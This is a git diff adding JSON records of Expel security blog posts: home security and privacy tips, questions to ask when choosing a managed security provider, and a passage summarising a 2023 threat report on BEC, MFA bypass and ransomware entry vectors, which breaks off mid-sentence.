diff --git a/10-tips-for-protecting-computer-security-and-privacy-at-home.json b/10-tips-for-protecting-computer-security-and-privacy-at-home.json new file mode 100644 index 0000000000000000000000000000000000000000..4c9daed2c4d865173fd43cb2bff9512767410cc8 --- /dev/null +++ b/10-tips-for-protecting-computer-security-and-privacy-at-home.json @@ -0,0 +1,6 @@ +{ + "title": "10 tips for protecting computer security and privacy at home", + "url": "https://expel.com/blog/10-tips-protecting-computer-security-privacy-at-home/", + "date": "Apr 23, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 10 tips for protecting computer security and privacy at home Tips \u00b7 7 MIN READ \u00b7 DAVID SCHUETZ \u00b7 APR 23, 2020 \u00b7 TAGS: Get technical / Heads up / How to Whether you\u2019re at home or at the office, there\u2019s a good chance you\u2019re relying on the internet. At the office you might have a security team who works hard to ensure your data is protected. But what about protecting your security at home? As of late, it seems like nearly everything is connected to our Wi-Fi. From multiple laptops and cell phones, to thermostats and light switches, smart technology makes our lives easier. And now in the age of social distancing, we are relying on our home networks more than ever. But the idea of being responsible for keeping your personal network connections and devices secure can be daunting. Does this mean you should live in a constant state of fear that someone will hack into your network or devices? No. But you do need to know about some steps to take to protect yourself. So \u2026 what threats should you be worried about, exactly? Most common threats For the purpose of this post, let\u2019s put vulnerabilities into three buckets \u2013 networks, endpoints and online behavior \u2013 and talk about why you should care. Networks If it\u2019s connected to the internet (laptops, TVs, voice assistants, etc.), then it can probably access other devices at home. Which means there are ample opportunities for attackers to find entry as we transmit data throughout our networks. But, unless you live off the grid, you don\u2019t have much choice except to rely on the internet to function in society. Think about securing your networks like locking your doors at home. You don\u2019t want attackers to come in and steal your belongings. And you definitely don\u2019t want them using your home to conduct criminal activity (resulting in the FBI busting down your door). Opening a port on your router for a game, connecting a thermostat to the cloud, even giving a visitor your Wi-Fi password for their phone \u2013 these can all open our networks to potential threats. Luckily, there are relatively simple ways you can make sure no one is slipping in your back door while you aren\u2019t paying attention (check out the 10 tips at the end of this post). I also get a lot of questions about using public Wi-Fi. Here\u2019s my advice: getting attacked while using public Wi-Fi isn\u2019t probable if you aren\u2019t a big target, but it is possible. That\u2019s why it\u2019s important to be thoughtful when you are using networks outside of your home. Improve your security on public Wi-Fi by using a VPN, or avoid the Wi-Fi altogether and tether to your cell phone (ideally with a cable). Endpoints Many built-in services on laptops can create more opportunities for attackers. A well-known attack is a fake \u201chelp desk\u201d call, tricking someone into granting remote access to their screen. Unless you directly call for IT support, no one needs you to share your screen or to enable remote control. Avoid keeping file sharing features like AirDrop on (and even then, set to accept files from contacts only). Turn on file sharing and remote access only when you need it, and turn it off again once you\u2019re done. Think about the apps you use, too. Be careful when installing an app that asks you to change network settings \u2013 it could be trying to watch your web traffic. And if an application asks for access to your location, contacts, or other privacy-related content, don\u2019t say \u201cYes\u201d unless you understand exactly why it\u2019s asking. As a general rule, lock your computer screen if you get up to grab a cup of coffee and put a lock on your cell phone screen. It\u2019s helpful to update your settings so your screen locks automatically after being idle for five minutes. Sure, locking screens might matter a little less if you live alone and are working from home, but these are still good habits to adopt. Online behavior Attackers often count on us to make a mistake and accidentally open the door for them. Think about the number of times you enter your bank and credit card information when you\u2019re ordering groceries from Amazon. Make sure you\u2019re shopping through reputable dealers and avoid storing your credit card information on a website. Many banks will allow you to set up text message alerts for large purchases or unusual activity \u2013 a smart feature to enable, to be on the safe side. Then there\u2019s phishing. What makes something look suspicious? Emails with a sense of urgency or a time limit, obscure invoices and warnings of disastrous outcomes are all red flags. Pop-ups that won\u2019t go away or are asking you to download something are often nefarious. Make sure you also hover over links and investigate them before clicking them. Do I need to bother mentioning that you shouldn\u2019t plug an unknown USB drive into your computer? Just in case\u2026don\u2019t do that. Don\u2019t be too quick when granting access to shared documents in G-suite or iCloud, for example. Make sure people and organizations can be vouched for and are trusted before granting access. Watch what you share on social media. Never give out your address or personal information. Hackers can search on social media sites to find answers to security questions. Tips and tricks for computer safety and privacy We\u2019ve only scratched the surface and already this looks like a lot of work. How can you make sure you aren\u2019t allowing yourself to be a target without spending your entire day thinking of all the ways you can be attacked? Use these 10 tips and tricks. Create strong passwords, don\u2019t reuse them on different sites, and ALWAYS use MFA \u2013 multi-factor authentication \u2013 when given the option (these are one-time passwords, push messages, even text messages in a pinch). Also, use a password manager application! A good password manager can make it easy to select strong, unique passwords, and should support many built-in MFA systems. They can warn you if you\u2019ve accidentally reused a password, or if you forgot to enable MFA. They can even alert you when sites you visit have had a recent password breach. Keep your software updated on operating systems, apps, laptops, cell phones and routers. Vendors are constantly patching bugs and security holes, some of which can be critical entry points for an attacker. Most operating systems and app stores can automatically update their software for you. Keeping your home network updated (Wi-Fi routers, etc.) isn\u2019t quite as critical, but if it\u2019s been years since you looked at your router, it may be a good idea to check for updates. Use WPA2 with a strong password when setting up Wi-Fi at home. For your visitors, consider setting up a guest network with a different network name and password. Disallow remote access to your network and desktop (remote login, screen and file sharing, etc.) by disabling it on your computers and limiting the number of ports you let through the internet router. When you do need it, enable it only for the time you\u2019ll be using it, and then immediately turn it back off again. Create a separate administrator account, and use a non-admin account for day-to-day activity. By keeping your administrator \u201cpersona\u201d separate from your daily use account, you lessen the chance that you may accidentally install malicious software without paying attention (many of us are a little too quick to click that \u201cOK\u201d button when we are prompted). By forcing you to switch to a different account, you ensure that a random, \u201cOh, I need your admin password now,\u201d prompt isn\u2019t going to break your computer, and makes installation of software and system-level changes a much more explicit action. Be careful with what you share online. Many sites still use \u201csecret questions\u201d to help you recover passwords. But a secret question like \u201cWhat brand was your first car?\u201d is only secret if that information is hard to find. Many common secret questions end up being things that people frequently share online (as part of a Facebook profile, or some forgotten tweet that might be easily searched for). Still others may be found from common data aggregation services \u2013 it\u2019s surprisingly easy to find the last five home addresses for just about anyone, often for no charge. Also, you should be careful not to give away too much about where you are (\u201cI\u2019m in Europe for a month, and our dogs are at the kennel, so our big suburban home in the wooded neighborhood is COMPLETELY UNATTENDED.\u201d) It\u2019s not likely that burglars are trolling social media to find targets, but you shouldn\u2019t make it too easy for them, either. Be thoughtful about the apps you install and always download from a trusted app store when possible. The \u201cbig\u201d app stores (Apple, Google, etc.) do a pretty good job of making sure that malicious software is kept out, and sticking to just those sources will go a long way to keeping you safe and secure. Whenever something (especially a website) prompts you to download a \u201cspecial app,\u201d don\u2019t download it right then and there. Instead, note what the file is (or does) and try to find it, or a suitable equivalent, in one of the main app stores. Even if you can\u2019t find it in the app store, if you can independently source it on the web, rather than taking the version the website just offered, that\u2019s usually a better plan. Have a keen eye for phishing and social engineering. Scams still come through email more than any other method, but the phone is a growing source of computer attacks. The most common is some variant of a \u201chelp desk\u201d calling to warn you that your computer is compromised, and asking you to do things to help them secure it (which instead just opens it up to their attacks). Plus there are all manner of old-school confidence tricks that people still succeed in pulling off, through phone calls, text messages and email. Learn how to recognize these, and swiftly ignore them when they happen (hang up, delete, etc.). If your router (and tech-fu) supports it, put all your internet of things, er, things (security cameras, baby monitors, refrigerators, smart-locks, etc.) on a totally separate network with its own access point. This is a great place to put your guest network as well, though they\u2019ll lose the ability to interact with your TV, etc. Backups, backups, BACKUPs! Backing up your data is a pain. Do it anyways. Follow the 3-2-1 rule: Keep 3 copies of your data; on 2 different systems (for example, one in the den, one in the basement); and 1 off-site (like at a friend or relative\u2019s house). Keeping two copies at home protects you against a single computer failure or breach, keeping one outside of the house protects you against a house fire. Cloud based services like Backblaze are fantastic for offsite backups. Have a question about keeping your stuff secure at home? We\u2019ve got lots of security nerds over here who\u2019d love to help you. Just send us a note ." +} \ No newline at end of file diff --git a/12-revealing-questions-to-ask-when-evaluating-an-mssp-or.json b/12-revealing-questions-to-ask-when-evaluating-an-mssp-or.json new file mode 100644 index 0000000000000000000000000000000000000000..88fbfe62c6fc9d16316d018fb234319660c04558 --- /dev/null +++ b/12-revealing-questions-to-ask-when-evaluating-an-mssp-or.json @@ -0,0 +1,6 @@ +{ + "title": "12 revealing questions to ask when evaluating an MSSP or ...", + "url": "https://expel.com/blog/12-revealing-questions-when-evaluating-mssp-mdr-vendor/", + "date": "Feb 19, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 12 revealing questions to ask when evaluating an MSSP or MDR vendor Tips \u00b7 9 MIN READ \u00b7 YANEK KORFF \u00b7 FEB 19, 2019 \u00b7 TAGS: How to / Managed security / Planning / Selecting tech / Tools Over the last 20 years, we\u2019ve heard all kinds of interesting questions as prospective customers evaluate which type of managed cybersecurity service is right for them. The questions are often buried in a big spreadsheet, otherwise known as a request for proposal (RFP). Some of them are remarkably well thought out and put together. However, the vast majority follow a well-worn path and are kind of predictable (check out Gartner\u2019s MSSP RFP Toolkit for some of the greatest hits). But the thing about predictable questions is they generate \u2014 you guessed it \u2014 predictable answers that leave one provider sounding a lot like the rest. So in an attempt to arm you with a few questions that\u2019ll make your prospective MSSP or managed detection and response (MDR) provider stop and think, we\u2019ve compiled a short list of revealing questions that we think any service provider should be able to answer with flying colors. (Although sadly, we find that many don\u2019t.) Without further ado, here we go. Can you provide an example of ways you\u2019ve adapted your service to your customers\u2019 environments? You know as well as we do that one size doesn\u2019t fit all. Your industry, your geography, your company, your strategy, your tactics, your team \u2026 all of these variables mean every company is different. Even if you find a service provider that\u2019s a good fit today, will they adapt so they can be a good fit tomorrow? How will they continue to tune their service so you\u2019re always getting what you need? Many providers will talk about \u201cbusiness context.\u201d It\u2019s a bit of a holy grail to security service providers so make sure you understand what it is and how it works. Can your provider differentiate an attacker from that weird PowerShell blip when Jenna the sysadmin runs her same PowerShell command every Wednesday morning? Can they react faster if the CFO gets phished? Are they able to ignore PUP/PUA at one customer because it\u2019s noise, but report it every time at another because it\u2019s the CISO\u2019s priority? Without this ability, over time you\u2019ll feel like you\u2019re being served the same gruel day after day. How long, on average, did it take to fully onboard your last 10 customers, and at what point did you consider the onboarding complete? There are few activities in the managed security space that evoke more dread than onboarding. Notorious for exceptionally long, complex and error-prone disasters rife with miscommunication, onboarding roadmaps and project plans can get complex quickly. What\u2019s worse, success may mean one thing to the provider and something else to you. But it doesn\u2019t have to be this way. During the RFP process, make sure you understand what activities mark the onboarding process as being complete and ask your provider how long it took them to go through that process for their last 10 customers. Get real data. Or, even better, ask the provider if some of these customers can be references and validate this data. Remember, onboarding time has three components: calendar time (end to end how long it took), your organization\u2019s time (how much new customers have to do, and how long it takes) and the provider\u2019s time (you should care about this because it contributes to component #1 \u2014 calendar time). One last #protip for ya: ask your provider if you\u2019re going to have to pay for service during onboarding. Can you use my existing security technology or will you require that we implement new technology? You\u2019d think this one would be obvious, but many providers will mandate that you either buy new technology, add their technology (because they won\u2019t use what you already have) or introduce a duplicate technology (usually their SIEM) because their architecture demands it. A service provider in this space should be using the technology you already have in play and operationalizing it. That means ingesting the data your security products are already producing, analyzing that information and delivering answers about what matters and what doesn\u2019t. Now, not all technology is created equal. Some categories of security tech are best suited to detection, other categories are more useful when you\u2019re investigating an incident or proactively hunting for bad things in your environment. You\u2019ll want to make sure the tech you have in place can actually do what it needs to do. That said, this shouldn\u2019t come across as a requirement from your MSSP or MDR \u2014 a provider should not tell you that you need to buy this and that for anything to work. Instead, you should get a higher fidelity answer like: \u201cWithout an endpoint detection and response (EDR) tool, our ability to investigate will be limited, as will our hunting capability \u2014 some of which relies on EDR.\u201d How does your detection and response strategy differ among on-prem technology, cloud infrastructure and cloud applications? \u201cWe monitor your AWS, Azure and O365 environments for threats and respond immediately!\u201d Have you heard this one before? This isn\u2019t an answer. The way you differentiate between providers that \u201cspeak cloud\u201d and those that don\u2019t is by listening closely to their detection and response philosophy. What\u2019s different about security in the cloud versus on-prem? How are the approaches they take for static versus elastic cloud infrastructure different? Or are they? What about cloud applications? How do they think about the security of configuration settings versus the security of data residing in containers? Validating a security provider\u2019s ability to handle your cloud security is one of the more challenging aspects in the assessment process. Consider looping in people from your own organization that are responsible for your cloud strategy and implementation. They\u2019ll ask good questions and can help you evaluate the answers you receive. How will we work together during a security incident? When a security incident arises, communication is key. You and your service provider begin in a fog of war. Keeping exceptional clarity on \u201cwhat we know\u201d and \u201cwhat we don\u2019t know for sure yet\u201d is essential to navigate the investigation and response process that follows. Understanding how your provider will communicate this info (and how quickly) is important. Do you have to log into a portal and review a mostly static page updated once every few hours? That\u2019s a useful artifact, but not a useful communication method. Do you submit a ticket? Ugh. Instead, look for effective methods that include rapid info sharing and multi-person communication. Of course, during an incident you\u2019ll have to communicate with all sorts of people \u2014 inside and outside of your organization. Your service provider might have relationships with law firms who have experience in breach communications. They may also have relationships with incident response providers who can show up on-site at a moment\u2019s notice. Either way, do your own research and find firms that are a good fit for your organization. Of course, it\u2019s always easier to do this before an incident than during one. Running your own incident response tabletop exercises can reveal a lot (we\u2019ve even created a role-playing game to try and make it fun \u2014 give it a go and let us know what you think). Can you provide an example of a time you learned something from a customer that improved your service? A security service that fails to learn and grow isn\u2019t actually a security service. It\u2019s \u2026 well, we\u2019re not sure what it is, but at the end of the day it\u2019s pretty useless to you. Sure, it might provide the illusion of security, but in reality there\u2019s a lot of time spent turning cranks that produce nothing. We\u2019ve heard this complaint from more than a few CISOs: \u201cMy MSSP is a black box. I put my money in and nothing comes out.\u201d Your prospective service provider should have crisp examples of how they\u2019ve learned and improved the way they help all of their customers. And it should be material. Not something simple like, \u201cI found this threat here so I added it to my intel database.\u201d That\u2019s table stakes. What caused your service provider to rethink something and say to themselves, \u201cI think the way we\u2019re tackling this is wrong based on this customer feedback \u2026 let\u2019s do it differently?\u201d Demonstrating the ability to adapt ensures your service provider will grow with you. How will you give me the visibility I need to be confident that you\u2019re making the right decisions for my organization? Don\u2019t just trust, but verify. It\u2019s what you\u2019re paying your service provider to do after all, so you should have confidence not only that they\u2019re doing the right thing \u2026 but that they\u2019re doing it right too. Take a moment to think through the steps that comprise \u201csecurity operations.\u201d Triage. This is the process analysts go through to evaluate (often quickly) whether something is a false positive or warrants investigation. Sometimes these analysts are humans. Sometimes they\u2019re robots. Does your provider tell you both who made the decision and why? If they filter out something important very early but were wrong, that\u2019s a problem. Investigations. Will your provider show you what information their analysts pulled from your environment? Can you get a sense of the thought process they use to decide what to retrieve? And what to make of it? This is where expertise really comes into play. Reporting and response. Is the output you receive easy to understand? Are response actions clear, and do you have control over who-gets-to-meddle-with-what in your infrastructure? If you have to translate everything your provider is telling you so that mere mortals who don\u2019t speak security can understand it, that\u2019ll become frustrating \u2026 fast. As you take a step back and look through what\u2019s been done, does the provider have timestamps for every step that was taken so you can evaluate this information and measure whether their overall performance is improving or degrading? Ultimately, you have to answer this question: Did they show their work? That\u2019s the only way to verify that they\u2019re doing what you\u2019re paying them to do. When things start to break, how (quickly) do you find and fix the problem? When do I find out about it? If you\u2019ve worked with an MSSP before, you\u2019re familiar with this problem we\u2019re about to summarize. Nine months after a piece of technology stopped sending data, the provider found out it was broken. Because you told them. That\u2019s a big hit to your visibility and a lot of risk you took on without any warning. Not cool. How will your new prospective provider handle this? Can they detect when a device becomes unreachable? How fast? What about if the device stays online but stops sending data? Or worse \u2013 what if there\u2019s a significant and unexpected drop in data volume? Who\u2019s responsible for monitoring this stuff and how quickly can they recover? Get examples if you can, and bonus points if they provide you direct visibility into this kind of monitoring. How did you identify and report on an active red team engagement conducted on one of your customers\u2019 networks? Yeah, we know this one feels pretty specific, but we\u2019ve run into too many instances where customers brought in a relatively sophisticated red team partner only to discover their managed security provider was blind to these mock adversaries. They couldn\u2019t even detect them, let alone investigate or respond. To be clear, when we say red team , we\u2019re talking about a group of whitehats who try to break into your network, escalate privileges, move laterally and steal stuff \u2026 and then report on things you can do to improve your defenses. Can your new potential partner provide an example of this exercise playing out? How did they detect the \u201cattacker\u201d in this case and to what extent were they able to provide ongoing reporting? Once again, bonus points for the provider if they\u2019ll let you hear all of this directly from one of their current customers. When I have a question or concern how do I engage with your team? We talked about communication during an incident. What about when there\u2019s no incident? Is it the same process, or are there two different processes? The more you have to adapt to your provider\u2019s modes of communication, the less likely you\u2019ll remember to do the right thing when the time is right. Watch out for laggy ticketing systems and be cautious about support portals where the identity of the people you\u2019re talking to is hidden. Your partner\u2019s security analysts will have exceptionally generous access to your data. You should be able to get to know who they are and interact with them directly from time to time. Can you show me how you calculate the price of your service? Every provider will give you a price. But can you understand how and why they got to that number? Be wary of long rambling answers. If your prospective provider can\u2019t give you a crisp answer or, better yet, quote you a price on your first sales call, imagine how the conversation will go once you become their customer. If selected, can you provide a free 30-day proof of concept to demonstrate you can deliver on the expectations you\u2019ve set? After you\u2019ve asked all of your questions, appraised the responses and picked a winner there\u2019s a good chance you\u2019ll still be asking yourself, \u201cCan they really do all of these great things in my environment?\u201d Exaggerated sales and marketing claims are, unfortunately, one of the biggest scourges on the security industry. You don\u2019t want to get a few weeks into a new agreement and learn your new provider can\u2019t do everything they promised or, even worse, find out when they missed something important. One of the most effective ways to mitigate this risk is to hop on your provider\u2019s service on an interim basis. It gives you a chance to get a feel for what the interactions will be like and gives your potential partner an opportunity to prove themselves. And if your prospective service provider can\u2019t even get this operational within 30 days? Well, that tells you all you need to know. So there you have it. Twelve questions that can help you sleuth out what it will be like to work with your managed security provider. If you\u2019ve got other questions, we\u2019d love to hear them. Or if you\u2019re reading this and thinking \u201cmaybe I\u2019ll just build my own SOC,\u201d check out our post on all the things you\u2019ll need to consider if you\u2019re thinking of building a 24\u00d77 SOC." +} \ No newline at end of file diff --git a/12-ways-to-tell-if-your-managed-security-provider-won-t-suck.json b/12-ways-to-tell-if-your-managed-security-provider-won-t-suck.json new file mode 100644 index 0000000000000000000000000000000000000000..ff9f6dae6dbbcabc6fcea80f06579be7b8817cde --- /dev/null +++ b/12-ways-to-tell-if-your-managed-security-provider-won-t-suck.json @@ -0,0 +1,6 @@ +{ + "title": "12 ways to tell if your managed security provider won't suck ...", + "url": "https://expel.com/blog/12-ways-to-tell-managed-security-provider-wont-suck-next-year/", + "date": "Mar 22, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 12 ways to tell if your managed security provider won\u2019t suck next year Security operations \u00b7 9 MIN READ \u00b7 YANEK KORFF \u00b7 MAR 22, 2019 \u00b7 TAGS: CISO / How to / Managed security / Selecting tech / Tools I used to love my iPhone. Now, at best, it works fine when new features aren\u2019t getting in my way. I also remember when AOL was amazing, ICQ was the best chat client and Netscape was the go-to browser. Maybe it\u2019s inevitable that the things we love will eventually be superseded, though hopefully not too quickly. Let\u2019s take a look at \u201csecurity operations.\u201d Turning logs and other forms of security signal into useful actions is an activity that\u2019s been around for decades. Whether companies have their own internal capability or have outsourced to a managed security provider, the breach headlines have continued unabated. Okay, that\u2019s not entirely true \u2014 they\u2019ve accelerated. And yet, even in this morass that is the security industry, every once in a while you\u2019ll find someone truly delighted about the products or services they\u2019re using. But delighted customers are the exception when it comes to managed security service providers (MSSPs). Some will tell you that MSSPs take your money and give you nothing in return or that they\u2019re a black stain on our industry. In fact, according to Forrester\u2019s 2017 Global Business Technographics\u00ae Security Survey, 34 percent of responding organizations were actively evaluating alternatives or actively planning replacement of their existing MSSP . In an industry where three-year contracts are common, a third of the market was in the process of switching at the time of the survey. Math doesn\u2019t paint a pretty picture here. In this ten billion dollar industry that\u2019s growing nearly 10 percent each year, thousands of companies are beyond disgruntled: they\u2019re looking to get rid of their current provider. If you\u2019re somewhere in that one-third of the market that\u2019s looking to switch to another MSSP, you\u2019re probably thinking to yourself, \u201cI thought my provider would be better \u2026 and they were for a little while. Then it all went down the toilet.\u201d So, before you sign that next contract how do you determine the likelihood that the quality of the service will last? How long will you be happy with the quality of your service provider? You might be able to get a sense of this through a proof-of-concept exercise but that won\u2019t tell you much about how you\u2019ll feel a year (or five) from now. Delighters will become table-stakes over time \u2014 so, to truly satisfy you, any new service will have to do more than just not deteriorate. It has to improve. Constantly. Creating a culture that searches for quality Why is it so essential that quality is core to your provider\u2019s DNA? Well, because it\u2019s already part of yours. You\u2019ve got a limited budget and a part of your job is to get the most bang for your buck over time. So you\u2019ll constantly be changing your investments to ensure you\u2019re getting the most for your money. A dollar you spend a year from now should be doing more than a dollar today. This translates directly to your service provider: an hour of work your service provider does today had better do more for you a year from now than it does right this minute. This means everyone (yes, everyone) at your service provider\u2019s organization needs to be looking at ways to improve quality constantly. So how can you tell if an organization\u2019s got it? Here are some key characteristics that we\u2019ve seen that create an environment where a persistent focus on quality can emerge: People feel a sense of trust and psychological safety, People have ownership of the problems they\u2019re trying to solve, People have the energy to engage in quality-seeking behaviors, and People can honestly self-assess throughout the process. You\u2019re probably thinking \u201cthat sounds pretty soft and squishy.\u201d So how do you assess whether a company you\u2019re talking to has built this sort of culture? Well, without further ado, here are a dozen things you can do to sniff out whether \u201cthe search for quality\u201d exists at an organization. 1. In search of trust \u2013 look for transparency Transparency means more than just being forthcoming. It means making the effort to be easily understood. There\u2019s no shortage of places you can go to find examples of an org\u2019s transparency. Start with the website and see if you can figure out what the company does and how they do it. As you ask questions to fill in the gaps, take note of whether you can understand the answers or if they\u2019re wrapped in marketing buzzwords or technical mumbo-jumbo. See how deeply transparency extends into the organization. Spend some time to understand the company\u2019s high-level goals. As you run into various employees in your evaluation process, ask them what these goals are and what they think about them. Ask what\u2019s going well and what\u2019s challenging. If employees can\u2019t (or won\u2019t) be forthcoming when they\u2019re literally trying to sell you something, what are the chances they\u2019ll be honest when they screw up? 2. In search of trust \u2013 look for simple execution Trust is a fickle thing. As we approach new relationships, we come with some amount of default trust in the new partner. I like to call this the \u201ctrust bank.\u201d If you\u2019ve had your trust violated a little too often, you won\u2019t be very generous when it comes to initial your initial deposit in the trust bank. If you\u2019re a bit more optimistic you might make a huge trust deposit up front, thinking the best of people. The unfair thing about trust banks is that deposits are always small, but withdrawals are easily five times as large. During your conversations, the service provider will promise to do many things. They\u2019ll send you a summary. They\u2019ll put you in touch with another customer. They\u2019ll get you on the phone for a chat with someone with greater technical depth in an area that\u2019s important to you. They\u2019ll promise you a quote. Do they follow through on those things? And do they meet the expectations they set within the timeframes they promised? It is surprisingly difficult for people to consistently meet simple obligations like doing what they said they\u2019d do. So when you find that in an organization, it really stands out. 3. In search of trust \u2013 look for failure It\u2019s easy to provide examples of past successes. It\u2019s a lot harder to admit failure. You\u2019re about to sign up for a long-term service. You\u2019ve got a right to know what sort of problems there will be. How will they be identified, communicated and handled? Ask for an example, and ask for artifacts (redacted and/or anonymized presumably). Get the full story and ask a lot of questions to fill in the blanks. An organization that knows how to handle failures and turn them into success stories is well positioned to earn (and keep) your trust. 4. In search of ownership \u2013 identify roles and responsibilities You\u2019ll have the opportunity to meet several people at a potential provider during the courtship process. Pick two or three different roles and get a copy of their job description (this may or may not be what\u2019s posted on the company\u2019s website). Ask those employees what their responsibilities are and make sure things line up. Do employees seem to understand where their responsibilities start and end? Can they point to other teams within the org and tell you how the teams work together? Sounds pretty basic, but having a strong sense of ownership often breaks down when this foundation is missing. 5. In search of ownership \u2013 ask about projects When you\u2019re meeting with mid-level and senior people at the organization who aren\u2019t part of the management team, ask about what they\u2019re working on. Usually, technical people are more than happy to share some of the projects they have in flight. Then, ask why they\u2019re working on those projects. In organizations where employees feel a strong sense of ownership, they look at their work not as tasks, but as solving business problems or customer problems. They articulate their work in the context of something greater. 6. In search of energy \u2013 ask about work and life People think about \u201cwork/life balance\u201d differently. As you interact with people at your service provider, ask them how they view the work/life balance at the company. Does it meet their needs? Do they get vacation time? Sick leave? How much? Do people actually take vacation? Do people feel like they can disconnect? In environments where there are lots of \u201csingle points of failure,\u201d people tend to work hard constantly, be stressed out and make more mistakes. While this might happen from time to time due to shifts in staffing, it shouldn\u2019t be the norm. On the other hand, where people feel like they get the space they need to bring all their enthusiasm to bear, they\u2019ll do better work and you\u2019ll be happier for it. 7. In search of energy \u2013 ask about celebrations and praise One of the factors that contributes the most to quality work is recognition that individuals and teams have done well. Contrast this with environments in which \u201cthe beatings will continue until morale improves.\u201d Yeah, you\u2019ve been there and seen that. Ask about the last few company events, what they were and why they happened. What were they celebrating? What about the last spot award or \u201ckudos\u201d someone got? Can they remember when something like that happened? 8. In search of quality-seeking behaviors \u2013 ask about conflict There\u2019s plenty of info out on the interwebs about the negative effects of groupthink and the need for constructive debate. Yet \u201cconflict\u201d seems to be a dirty word in most office environments. Instead of having a difficult conversation we hear \u201clet\u2019s take it offline\u201d which is office lingo for \u201clet\u2019s stop talking about this because it\u2019s making me uncomfortable.\u201d Ask about disagreements, technical or otherwise, and how they\u2019re resolved within the organization. Ask for an example. You\u2019ll quickly get a sense as to how the environment supports constructive disagreement and the extent to which \u201coffice politics\u201d play a role. 9. In search of quality-seeking behaviors \u2013 ask about metrics You may only get operational insight into a subset of the metrics your service provider uses to measure the quality and efficacy of what they do every day. Have someone walk you through it. How does the org measure the effectiveness of detection logic? How do they measure the availability of technology, whether it\u2019s their own or yours? Can someone provide an example of a metric he or she thought was useful \u2014 but turns out it wasn\u2019t? Is there a metric the org recently added because they\u2019ve learned something new? Look for this engine of continuous improvement within the things they count and measure. 10. In search of quality-seeking behaviors \u2013 ask about hiring When you were hired, someone entrusted you to make good hiring decisions. When you hired a manager, you entrusted her to do the same. Maybe you provided feedback, coaching or training to help her be more effective. As you bring on a service provider, you have the same need. Their hiring practices will directly impact the quality of the service you experience over time. How do they think about hiring? Talk to the head of HR. Do they use a structured hiring process? How do they think about evaluating experience, skills and traits? What key traits do they look for in hires throughout the organization? Any organization with rich answers around these questions (especially when these answers are consistent throughout the organization) clearly has a high hiring bar. 11. In search of self-assessment \u2013 ask about evaluations Do employees have the opportunity to think about how they\u2019re doing and how they\u2019re growing? And does anyone guide them through this process? The answer here can\u2019t be as simple as \u201cyeah, we do annual reviews \u2026 and they\u2019re super stressful.\u201d A huge component of perpetually increasing quality is making sure that every employee has real, ongoing opportunities for learning and growth. As you meet security practitioners, engineers and managers, ask what they\u2019ve learned since they started. What technical and non-technical growth have they experienced and how has this helped them grow their careers? Who supported this growth and how much did the company do to help? Are there programs in place to encourage this development? The more a company does to invest in its employees, the more likely it is that those employees will be investing in improving the service you receive. 12. In search of self-assessment \u2013 look out for hubris We started this blog talking about some iconic names in technology like AOL and Apple. Do you remember when AOL \u201cbought\u201d Time Warner? Have you seen what happens to technology companies that become so full of themselves they feel like you\u2019re obligated to buy their stuff? That only lasts so long. This is a difficult area to assess but an important one. If everyone you talk to is convinced they\u2019re the best at everything they do, that\u2019s a warning sign. If everyone is taking themselves a little too seriously, there might not be enough room for fallibility. If it\u2019s \u201cour way or the highway\u201d and compromise is out of the question, then that provider probably isn\u2019t a good fit for you. These warning signs create blinders for an organization, making it difficult for them to see when they\u2019ve done something wrong and learn from that mistake. What if we\u2019re wrong about all of this? Perhaps we\u2019re wrong about what it takes to maintain a culture that generates quality over time. But we do know this for certain: When you\u2019re evaluating an MSSP, you should walk away feeling pretty confident that over the course of your working relationship you\u2019ll both get better together. Or maybe you\u2019re sitting there wondering what our answers would be for some of these questions. Well, you\u2019re welcome to ask \u2026 or maybe in the not-too-distant future, we\u2019ll publish some of them right here." +} \ No newline at end of file diff --git a/2023-great-expeltations-report-top-six-findings.json b/2023-great-expeltations-report-top-six-findings.json new file mode 100644 index 0000000000000000000000000000000000000000..87654f14dc99d02d57afd02d3d9ec74c4f1172ba --- /dev/null +++ b/2023-great-expeltations-report-top-six-findings.json @@ -0,0 +1,6 @@ +{ + "title": "2023 Great eXpeltations report: top six findings", + "url": "https://expel.com/blog/2023-great-expeltations-report-top-six-findings/", + "date": "Jan 31, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG 2023 Great eXpeltations report: top six findings Security operations \u00b7 2 MIN READ \u00b7 BEN BRIGIDA \u00b7 JAN 31, 2023 \u00b7 TAGS: MDR Bad news: 2022 was a big year in cybersecurity. Good news: We stopped a lot of attacks. Better news: We sure learned a lot, didn\u2019t we? We just released our Great eXpeltations annual report, which details the major trends we saw in the security operations center (SOC) last year\u2026and what you can do about them this year. You can grab your copy now , and here\u2019s a taste of what you\u2019ll find. Top findings from the Great eXpeltations report 1: Business email compromise (BEC) accounted for half of all incidents, and remains the top threat facing our customers. This finding is consistent with what we saw in 2021. Key numbers: Of the BEC attempts we identified: more than 99% were in Microsoft 365 (M365\u2014previously known as Office 365, or O365) and fewer than 1% occurred in Google Workspace. Fifty-three percent of all organizations experienced at least one BEC attempt, and one organization was targeted 104 times throughout the year. 2: Threat actors started moving away from authenticating via legacy protocols to bypass multi-factor authentication (MFA) in M365. Instead, the bad guys have adopted frameworks such as Evilginx2, facilitating adversary-in-the-middle (AiTM) phishing attacks to steal login credentials and session cookies for initial access and MFA bypass. FIDO2 (Fast ID Online 2) and certificate-based authentication stop AiTM attacks. However, many organizations don\u2019t use FIDO factors for MFA. 3: Threat actors targeted Workday to perpetrate payroll fraud. In July, our SOC team began seeing BEC attempts, across multiple customer environments, seeking illicit access to human capital management systems\u2014specifically, Workday. The goal of these attacks? Payroll and direct deposit fraud. Once hackers access Workday, they modify a compromised user\u2019s payroll settings to add their direct deposit information and redirecting the victim\u2019s paycheck into the attacker\u2019s account. (Which is just evil.) The lesson? Enforce MFA within Workday and implement approval workflows for changes to direct deposit information. 4: Eleven percent of incidents could have resulted in deployment of ransomware if we hadn\u2019t intervened. This represents a jump of seven percentage points over 2021. Microsoft has made it easier to block macros in files downloaded from the internet , so ransomware threat groups and their affiliates are abandoning use of visual basic for application (VBA) macros and Excel 4.0 macros to break into Windows-based environments. Instead, they\u2019re now using disk image (ISO), short-cut (LNK), and HTML application (HTA) files. Here are some stats we find interesting: Hackers used zipped JavaScript files to gain initial access in 44% of all ransomware incidents. ISO files were used to gain initial access in 12% of all ransomware incidents. This attack vector didn\u2019t make our list in 2021. Nine percent of all ransomware incidents started with an infected USB drive. 5: Six percent of business application compromise (BAC) attempts used push notification fatigue to satisfy MFA. Push notification fatigue occurs when attackers send repeated push notifications until the targeted employee 